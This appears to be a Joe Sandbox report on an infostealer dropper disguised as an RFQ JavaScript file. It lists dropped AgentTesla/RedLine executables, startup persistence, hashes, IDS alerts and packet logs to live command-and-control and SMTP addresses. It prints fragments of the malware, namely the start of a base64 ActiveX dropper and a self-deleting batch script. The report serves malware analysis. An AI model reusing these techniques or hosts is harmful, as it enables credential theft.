                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 79%
                                                                                Joe Sandbox View:
                                                                                • Filename: ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd, Detection: malicious, Browse
                                                                                • Filename: RFQ_PO_KMM7983972_ORDER_DETAILS.js, Detection: malicious, Browse
                                                                                • Filename: ORDER_DOCUMENT_PO_GQB793987646902.TXT.MPEG.PNG.CMD.cmd, Detection: malicious, Browse
                                                                                • Filename: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE, Detection: malicious, Browse
                                                                                • Filename: Order SMG 201906 20190816orderGMD#0498366Deta.exe, Detection: malicious, Browse
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0y.f............................>.... ........@.. .......................@............@.....................................S.......F.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...F...........................@..@.reloc....... ......................@..B................ .......H...........>...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.|........................................

                                                                                C:\Users\user\AppData\Local\Temp\server_BTC.exe

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):231936
                                                                                Entropy (8bit):5.039764014369673
                                                                                Encrypted:false
                                                                                SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                MD5:50D015016F20DA0905FD5B37D7834823
                                                                                SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                C:\Users\user\AppData\Local\Temp\surmount

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):1375744
                                                                                Entropy (8bit):7.833560173263823
                                                                                Encrypted:false
                                                                                SSDEEP:24576:f8wePJEHebqzk288kcdrarH4iRhJlLfsXpSos6P7j2KqQxi3SOIQ:0wehEHHzkv8XYr9lLE8os0j22xOt
                                                                                MD5:8631B355627AE1EFB5D1EDB43D0D377A
                                                                                SHA1:8209A5670E41F0BFF4A1B32967D72C0F814C08BB
                                                                                SHA-256:00BCB1DEF7468594CB071AFE44DFA7BF015CFE3AFE6D7E4A8D6242C8296F0D04
                                                                                SHA-512:341C9AA6F475A7EC813BD4DB643457E5CB37E5EB1D6C315552A161C6ED7F2B07A1E6D00763E0D025BA46195A3569E6BD6A6D258D10EF28C5C6940CCE7423E11B
                                                                                Malicious:false
                                                                                Preview:|h.JBQLX<TGR..B1.KK3K4HJ.3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX.TGR_Q.?R.B.j.I...eZ_9a!>7_&&?q-#_<$?.)Qh8%].[Xj...xU;#7.CO;vKK3K4HJ.v12zKEQLX8TGRQNB1RK.3D7CKV31:6JAG@X8TGR.ZB1R[K3KtDJP3q26ZAQLZ8TCRQNB1RKO3K4HJP31r#JAULX..RRSNB1RK[3K$HJP3!26ZAQLX8TWRQNB1RKK3K4.d\3a26JA.@X8WGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQ.v4T.RQNB1RKK3K4HJP3126JAQLX8TGR.:'I&KK3.2HJP#126BAQL\8TGRQNB1RKK3K4hJPS.@R+50LX.DKRQnB1RYG3K8HJP3126JAQLX8T.RQ.lS!8K3K4LJP31r:JAQLX8TGRQNB1RKK3K4HJ.31..82#/X8TG.YNBa^KK.C4HT\3126JAQLX8TGR.NB.RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGRQNB1RKK3K4HJP3126JAQLX8TGR

                                                                                C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):164
                                                                                Entropy (8bit):5.01536063413633
                                                                                Encrypted:false
                                                                                SSDEEP:3:mKDDCMNvFbuov3DCHyg4E2J5xAIJWAdEFKDwU1hGDCHyg4E2J5xAInTRI5yLRIQK:hWKdbuoLCHhJ23fJWAawDNeCHhJ23fT2
                                                                                MD5:01CBBB372040FAC83A160BA5191611ED
                                                                                SHA1:C34367F2965E8BFBF6515DCD8160B924B3E8EC16
                                                                                SHA-256:1AE43158FA5EB183ED9324614B187A9781F39DF8C65607B26649E383EC363FD7
                                                                                SHA-512:4982EAA35B657D74500412D8C91A9BC4A06CBFCDDB35B57734D4236BA3FC77FA669BC129C2D55A3AB1D62BA0797F75A8E85384C86A7277617DBD4F48B7661826
                                                                                Malicious:false
                                                                                Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp6964.tmp.cmd" /f /q..

                                                                                C:\Users\user\AppData\Local\Temp\x.exe

                                                                                Download File
                                                                                Process:C:\Windows\System32\wscript.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):3657539
                                                                                Entropy (8bit):7.903394754348056
                                                                                Encrypted:false
                                                                                SSDEEP:98304:7trbTA1qy46WARSBOunlQ6WVIf007uBOr0T2C:hc1c23afb8Org2C
                                                                                MD5:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                SHA1:6433ACE48FC9A6D4DE4451D0A35C91AF7C69D507
                                                                                SHA-256:771B160A95FB3BAFE050A2E5552A1C697A5982773104C6A2B9549B538935ED23
                                                                                SHA-512:66D19FD4EEA704B67E5F3568590EBE3EA42CDB0426FA4BAFBDB35814F9FAC21AC37126E4A3EA238F8DFB8E5CD5C2BDBE4DB60A26B72CE3883F40C6BA4D2113D7
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................1b.....P.)....Q.....y.....i.......}...N......d.....`.....m.....g....Rich............PE..L....%O..........#..................e....... ....@..........................P................@.......@.........................T.......(............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.data...X........h..................@....rsrc...(............T..............@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):231936
                                                                                Entropy (8bit):5.039764014369673
                                                                                Encrypted:false
                                                                                SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                MD5:50D015016F20DA0905FD5B37D7834823
                                                                                SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 83%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

                                                                                Download File
                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Sep 26 06:21:42 2024, mtime=Thu Sep 26 06:21:42 2024, atime=Thu Sep 26 06:21:39 2024, length=231936, window=
                                                                                Category:dropped
                                                                                Size (bytes):1794
                                                                                Entropy (8bit):3.508182621163374
                                                                                Encrypted:false
                                                                                SSDEEP:24:8qHn8pwNsf5UAZs4FSnclwO4ZTqlLi7i9m:8qHn8y6f9S4+clwZTqlCC
                                                                                MD5:94DD92817ADD3C87CB8939F308EBA8FD
                                                                                SHA1:38029F47BD5EB4E5C37CF2D2AA2148139F54FE13
                                                                                SHA-256:32E085163262D822BF73AE56C2F568FEA755E20481FC0AC0F3AB7287A7CFBE7B
                                                                                SHA-512:87A55CE401C6A15F6D9C1576DD25B1C0172E51EAE9754D0DB0564441281BE136E89CE222C654744DE3D3B1E90E2940E066F5FD65869E56B6C85F6B875CA9E346
                                                                                Malicious:false
                                                                                Preview:L..................F.@.. ....iE.......G.......\...............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....z%.....Y.J.........t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B:Y.:..........................d...A.p.p.D.a.t.a...B.V.1.....:Y.:..Roaming.@......EW)B:Y.:..........................u..R.o.a.m.i.n.g.....T.1.....:Y.:..ACCApi..>......:Y.::Y.:...........................N..A.C.C.A.p.i.....l.2.....:Y.: .TROJAN~1.EXE..P......:Y.::Y.:.....!....................u..T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...........2.\......C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................

                                                                                C:\Users\user\AppData\Roaming\bb5c1732d3a25be8.bin

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):12320
                                                                                Entropy (8bit):7.985565352934576
                                                                                Encrypted:false
                                                                                SSDEEP:192:GfPVMGiuhQJ82+fXwJkPlJV/47YoEeIlX1CS+UvhbDPIopxp5B1x9A4R:sjitJ8tXwetQLsZ1HPZ/PIoZZx9pR
                                                                                MD5:E49333D73E0424BD8083EF93C2B15444
                                                                                SHA1:8325435F2DF2FCDEFED04EF67FD8735AD1906019
                                                                                SHA-256:68F368D37EC656986BEF3C4AA8176C70D0852250E074346EE0C85115BF75E9F9
                                                                                SHA-512:FB72859F6945A3344507D8321A8CF2BF3F161D92BB8F594394D4F1CC843199A69FE34FD4A8335323E1C5523AA858733B5E4AAB80B07E8D12A88D7CDAE736849C
                                                                                Malicious:false
                                                                                Preview:.>c.....J.<v.j.....G$..RNqq'....k..8.....Srs..W..q.4....i...p..fi......>....8......W..)..q...u....q...uE2...d....pS+.....$in...4......c.....u*.2Y|.0T.a./....).M....#.1.0......\n....X.\...r..L...s.*X..j`...?\........3....t.E..,..'.2I.fnY...G...n....@.. /..t.tAY.8......R.....4NvZ.............ld.=..S..&'....pT.t#~.h.x.T......g....YEY. ....q.\B./.@."..o...?n.<...e..=Z0.^-3.`7..x..&B/......9...U.{.Q_0..{(.y7.:6...... ...LXY...>M...L..v.K.F7......x.A..w.e...;.<0.7..1....W...N...o}....d...%K.BA_.$...'......M....dd..}r.'N....>b....i......l.W...*......AD..h@'...'..U..3.m......#.r.StJ.+L..pQ.q._...y.].:....].f...Tm.~..Ob_'.t .H..wi....+x...L.W3.|........$9Q_...W..o.z.1{...=6.........=.-....%{h..uN$.o...Bq.&...]...!...G....|.p....{L~.....O....".?.{x;W@7d.&..;.)o..L......F.........u.a.\.:B...,`....P..=ZBn......j...,....oE.@eu..(..H..Cm&.(.V..?J..ZC...U3........J2^N1..KD..!.u..We.............<.'..dz......z..J...pfz{%% ....0..Sj...#.........n

                                                                                \Device\Null

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\timeout.exe
                                                                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                                Category:dropped
                                                                                Size (bytes):66
                                                                                Entropy (8bit):4.524640141725149
                                                                                Encrypted:false
                                                                                SSDEEP:3:hYF0ZAR+mQRKVxLZQtL1yn:hYFoaNZQtLMn
                                                                                MD5:04A92849F3C0EE6AC36734C600767EFA
                                                                                SHA1:C77B1FF27BC49AB80202109B35C38EE3548429BD
                                                                                SHA-256:28B3755A05430A287E4DAFA9F8D8EF27F1EDA4C65E971E42A7CA5E5D4FAE5023
                                                                                SHA-512:6D67DF8175522BF45E7375932754B1CA3234292D7B1B957D1F68E4FABE6E7DA0FC52C6D22CF1390895300BA7F14E645FCDBF9DCD14375D8D43A3646C0E338704
                                                                                Malicious:false
                                                                                Preview:..Waiting for 6 seconds, press a key to continue ....5.4.3.2.1.0..

                                                                                Static File Info

                                                                                General

                                                                                File type:ASCII text, with very long lines (65438), with CRLF line terminators
                                                                                Entropy (8bit):5.971360564283784
                                                                                TrID:
                                                                                  File name:RFQ -PO.20571-0001-QBMS-PRQ-0200140.js
                                                                                  File size:4'877'072 bytes
                                                                                  MD5:5e1cdaa87915b9b6e7d852c0b7ce272b
                                                                                  SHA1:978f40e995fe1fd0e10f73f8b7924dd31ffb6267
                                                                                  SHA256:3335d593c4a2f7ab94a35fd5a0991026d1800592a18cc842686d3bf6bb66503d
                                                                                  SHA512:94e1811a87af0165989d69732d20f1c00981eeeb15ed976b01ff9afcdd41a38ff201252f8e003bba92541757603c29b80c69c897fc41cab51ad88b7698754425
                                                                                  SSDEEP:49152:Dy0k7TbmSOqsmBdkQUUb/YnBxbb20HelA1mvpxVAm8Zp0v97quF8yAmhR/:2
                                                                                  TLSH:043612328D23BCBF175C364AA01D1E461E941EC392999BB4DA8914B776CC701DE3E8BD
                                                                                  File Content Preview:var D=new ActiveXObject("Microsoft.XMLDOM")..var E=D.createElement("t")..E.dataType="bin.base64"..E.text="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TI

                                                                                  File Icon

                                                                                  Icon Hash:68d69b8bb6aa9a86

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-09-26T09:21:45.819379+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:45.819379+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:45.974042+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1212.162.149.532049192.168.2.862827TCP
                                                                                  2024-09-26T09:21:51.238622+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:51.604628+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:51.828606+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:51.913733+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1212.162.149.532049192.168.2.862827TCP
                                                                                  2024-09-26T09:21:52.108691+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:53.186085+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:53.875047+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:54.077941+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:54.211040+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:54.356399+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:55.060897+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:55.238452+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:56.197571+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:56.202778+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:57.257223+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:57.395273+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:57.625513+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:21:57.654624+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:22:00.347751+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:22:00.518185+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:22:00.686262+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:22:01.476954+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:22:01.648761+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:22:01.809750+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:22:02.168029+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP
                                                                                  2024-09-26T09:22:02.584849+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.862827212.162.149.532049TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Sep 26, 2024 09:21:42.491238117 CEST62826443192.168.2.8104.26.13.205
                                                                                  Sep 26, 2024 09:21:42.491292953 CEST44362826104.26.13.205192.168.2.8
                                                                                  Sep 26, 2024 09:21:42.491367102 CEST62826443192.168.2.8104.26.13.205
                                                                                  Sep 26, 2024 09:21:42.499555111 CEST62826443192.168.2.8104.26.13.205
                                                                                  Sep 26, 2024 09:21:42.499577045 CEST44362826104.26.13.205192.168.2.8
                                                                                  Sep 26, 2024 09:21:42.970721006 CEST44362826104.26.13.205192.168.2.8
                                                                                  Sep 26, 2024 09:21:42.970810890 CEST62826443192.168.2.8104.26.13.205
                                                                                  Sep 26, 2024 09:21:42.996426105 CEST62826443192.168.2.8104.26.13.205
                                                                                  Sep 26, 2024 09:21:42.996452093 CEST44362826104.26.13.205192.168.2.8
                                                                                  Sep 26, 2024 09:21:42.996891975 CEST44362826104.26.13.205192.168.2.8
                                                                                  Sep 26, 2024 09:21:43.187968016 CEST62826443192.168.2.8104.26.13.205
                                                                                  Sep 26, 2024 09:21:43.584867954 CEST62826443192.168.2.8104.26.13.205
                                                                                  Sep 26, 2024 09:21:43.627405882 CEST44362826104.26.13.205192.168.2.8
                                                                                  Sep 26, 2024 09:21:44.230170012 CEST44362826104.26.13.205192.168.2.8
                                                                                  Sep 26, 2024 09:21:44.230257034 CEST44362826104.26.13.205192.168.2.8
                                                                                  Sep 26, 2024 09:21:44.230314970 CEST62826443192.168.2.8104.26.13.205
                                                                                  Sep 26, 2024 09:21:44.236763000 CEST62826443192.168.2.8104.26.13.205
                                                                                  Sep 26, 2024 09:21:44.633270979 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:44.638832092 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:44.638906956 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:44.660520077 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:44.675995111 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:45.771760941 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:45.772000074 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:45.772067070 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:45.772136927 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:45.772265911 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:45.788741112 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:45.794917107 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:45.794996023 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:45.819379091 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:45.825978041 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:45.974041939 CEST204962827212.162.149.53192.168.2.8
                                                                                  Sep 26, 2024 09:21:46.172965050 CEST628272049192.168.2.8212.162.149.53
                                                                                  Sep 26, 2024 09:21:46.521976948 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:46.527331114 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:46.532233953 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:46.708118916 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:46.713567972 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:46.718381882 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:46.895086050 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:46.895541906 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:46.900439024 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.086836100 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.086860895 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.086885929 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.086914062 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:47.120405912 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:47.125447035 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.301140070 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.305260897 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:47.310146093 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.488697052 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.513219118 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:47.518095016 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.694093943 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.695127010 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:47.699958086 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.882879019 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:47.883146048 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:47.889050007 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.063831091 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.064160109 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:48.068965912 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.250420094 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.250808954 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:48.255562067 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.431370974 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.432207108 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:48.432377100 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:48.432472944 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:48.432590961 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:48.437038898 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.437083960 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.437289000 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.437347889 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.786349058 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:48.889149904 CEST62828587192.168.2.851.195.88.199
                                                                                  Sep 26, 2024 09:21:48.894103050 CEST5876282851.195.88.199192.168.2.8
                                                                                  Sep 26, 2024 09:21:49.070702076 CEST5876282851.195.88.199192.168.2.8
